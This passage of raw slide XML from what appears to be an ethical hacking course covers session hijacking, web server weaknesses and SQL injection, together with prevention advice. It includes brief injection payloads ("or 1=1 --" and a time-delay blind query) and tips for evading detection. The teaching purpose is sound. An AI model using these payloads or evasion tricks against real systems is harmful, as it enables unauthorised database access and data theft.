              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>H</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>ijack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> the session just after Authentication</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Can happen on network Level or Application level</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>People do not want to re-authenticate on every single HTTP / TCP request. So applications do have Persistence methods. Say Cookies, Specific URLs, Hidden form fields, session ID, token, </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="513" name="Google Shape;513;p84"/>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8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a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="519" name="Google Shape;519;p85"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4066575" y="308325"/>
            <a:ext cx="4699800" cy="4026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Network Layer</a:t>
            </a:r>
            <a:endParaRPr b="1"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TCP/IP: in you can find the sequence number, you can inject packets; with source IP spoofing or even DOS on main user</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DNS Spoofing</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UDP session h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="F6F2D2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ijack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="F6F2D2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ing: answering quicker than the server or other ways to trick the victim to think that you are the server</a:t>
            </a:r>
            <a:endParaRPr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App Layer</a:t>
            </a:r>
            <a:endParaRPr b="1"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HTTP. HTTP needs some kind of persistence layer: cookies, custom URLs, hidden form fields, session ID, token, ... whoever gets this session ID, token, cookie, .. will be known as this URS.</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How to get these? sniffing and resending these, MITM. Referrals</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Even bruteforce for session IDs! </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Session Fixation: create the URL with session ID and share</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Session Donation: login into the website, create a fake account and share the link with others .. they have logged in so they will use!</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XSS. bob logged in on X with cookie. Attacker sends an script to bob. When it is run, it will send a request to site X to download from bobs site using the cookie. Stored vs Reflected.</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Also malware, bad extensions, API hooking on exe and dll, ... Sometimes called Man In the Browser</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Can come from log files! </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active vs passive (injecting or no)</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blind hijack: attacker can not see the result</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a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="F6F2D2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F6F2D2"/>
              </a:buClr>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="F6F2D2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>check the Referer in headers, cookies, firesheep</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="F6F2D2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1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انواع</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> حمله ها</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="1" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="133" name="Google Shape;133;p23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4088600" y="411050"/>
            <a:ext cx="4537500" cy="4026600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="1" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-226059" lvl="0" marL="365760" rtl="1" algn="r">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>انواع حمله</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>OS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Problematic configs</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>application level issues</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Buffer overflow</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>...</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>shrinkwrap (defaults)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8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Prevention</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sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="525" name="Google Shape;525;p86"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4066575" y="308325"/>
            <a:ext cx="4699800" cy="4026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Physical to prevent sniffing, Port security, ..</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Application layer:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Good session IDs. Not predictable &amp; no calculatable</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Never use URLs with session IDs</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Do not reuse session IDs</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Flag cookies as HTTP only (no access to JS)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Flag cookies as SECURE (only https)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>TLS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Re-Auth</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Invalidate tokens based on inactivity and time</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>OAUTH</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>forced logouts</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Multi factor logins</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="526" name="Google Shape;526;p86"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="535600" y="1267850"/>
            <a:ext cx="3030300" cy="40266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457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>On WASP session management is always there</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>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87"/>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Web servers and Applications</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="532" name="Google Shape;532;p87"/>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Client server architecture (admin, db, user, programmer, …)</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Web servers: apache, IIS, Nginx</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Web aps: Browser based, Client based, Mobile Apps</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Cloud: IaaS, PaaS, SaaS</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Web App: Presentation Layer, Logic Layer, Data Layer</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Parts: Cookies, Login, Web server, Sessions, Permissions, Application Content, Data access, Data Store, Logic, …</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="533" name="Google Shape;533;p87"/>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88"/>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a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="539" name="Google Shape;539;p88"/>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0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="F6F2D2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Problems:</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="F6F2D2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F6F2D2"/>
              </a:buClr>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="F6F2D2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Buffer Overflow</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DOS / DDOS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Error Messages will reveal data</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Misconfigurations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Input Validation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XSS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Injection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Upload Bomb</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Defaults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Session Management Issues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Encryption problems (old ssl versions)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Directory Traversal</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="F6F2D2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="F6F2D2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Tools</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Burp Suite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Vega Scanner (Kali)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="F6F2D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89"/>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SQL Injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="545" name="Google Shape;545;p89"/>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RDMS, SQL</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Used for altering tables (even a price!) or bypassing checks or breaking sites or stealing data or ...</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Complex! DB + Web app + SQL</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>CEH is not a SQL course, you </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>should</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t> know it</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Mostly caused by flaws in apps (specially unchecked input) and is responsible for many of the famous attacks</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="546" name="Google Shape;546;p89"/>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9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Attacks</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="552" name="Google Shape;552;p90"/>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Anatomy of a web app</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Insertion of characters into existing SQL commands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Types depend on the db. But ;, ‘, --, /* comment */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Sample of ‘ in username ( or 1=1 --)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Return types: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Error based: if you create errors, you might be able to see some info!</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Union based: piggyback other data</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Blind: run commands without output. Attackers use time to see if it worked or not. Or drop will be visible soon (; IF EXISTS(SELECT * FROM users) WAITFOR DELAY '0 :0 :10 '-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Avoid detection by 20&gt;1 instead of 1=1, HEX, spaces, comments in the middle, obfuscate,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How to attack? Find a sql path and try!</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6" name="Shape 556"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="557" name="Google Shape;557;p91"/>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Tools and Prevention</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="558" name="Google Shape;558;p91"/>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0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="F6F2D2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Tools</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Burp can show the requests, automate checks.,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HAVIJ</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Netsparker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OWASP.org, search for testing for SQL injection</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="F6F2D2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F6F2D2"/>
              </a:buClr>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="F6F2D2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="F6F2D2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Prevention</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Checking all input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Using well known </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="F6F2D2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>libraries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Firewall can send data to a web application firewall / IDS / IPS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a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="F6F2D2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ave  good stored procedures and only answer via them</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Correct rights. No need to run any system command from the db or give drop right to the web user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Logs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backup!</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9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WiFi Security</a:t>
            </a:r>
